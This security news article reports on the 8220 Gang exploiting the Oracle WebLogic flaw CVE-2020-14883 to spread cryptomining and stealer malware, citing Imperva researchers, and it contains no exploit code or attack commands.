8220 Gang Exploits Oracle WebLogic Server Flaw to Proliferate Malware

December 19, 2023

The cybercriminal collective known as the 8220 Gang has been detected exploiting a significant vulnerability (CVE-2020-14883) in Oracle's WebLogic Server to disseminate their malware. This flaw, with a CVSS score of 7.2, is a remote code execution bug that could be leveraged by authenticated attackers to gain control over vulnerable servers.

Imperva, in a report issued last week, stated, "This vulnerability allows remote authenticated attackers to execute code using a gadget chain and is commonly chained with CVE-2020-14882 (an authentication bypass vulnerability also affecting Oracle Weblogic Server) or the use of leaked, stolen, or weak credentials." The 8220 Gang has a track record of exploiting known security vulnerabilities to propagate cryptojacking malware.

Earlier in May, the group was noticed using another Oracle WebLogic server vulnerability (CVE-2017-3506, CVSS score: 7.4) to integrate devices into a crypto mining botnet. Imperva's recent documentation of the group's attack chains includes the exploitation of CVE-2020-14883 to create specially designed XML files and ultimately execute code that deploys stealer and coin mining malware such as Agent Tesla, rhajk, and nasqa.

According to Daniel Johnston, a security researcher at Imperva, the group seems to be opportunistic in their target selection, with no discernible trend in country or industry. Their campaign targets include sectors such as healthcare, telecommunications, and financial services in countries like the U.S., South Africa, Spain, Columbia, and Mexico. Johnston further added, "The group relies on simple, publicly available exploits to target well-known vulnerabilities and exploit easy targets to achieve their objectives. While considered unsophisticated, they are constantly evolving their tactics and techniques to evade detection."

Latest News

Like what you see?

Get a digest of headlines, vulnerabilities, risk context, and more delivered to your inbox.

Subscribe Below

By submitting this form, you’re giving us permission to email you. You may unsubscribe at any time.

Accelerate Security Teams

Continuously identify and prioritize the risks that are most critical in your environment, and validate that your remediation efforts are reducing risk. An always-on single source-of-truth of your assets, services, and vulnerabilities.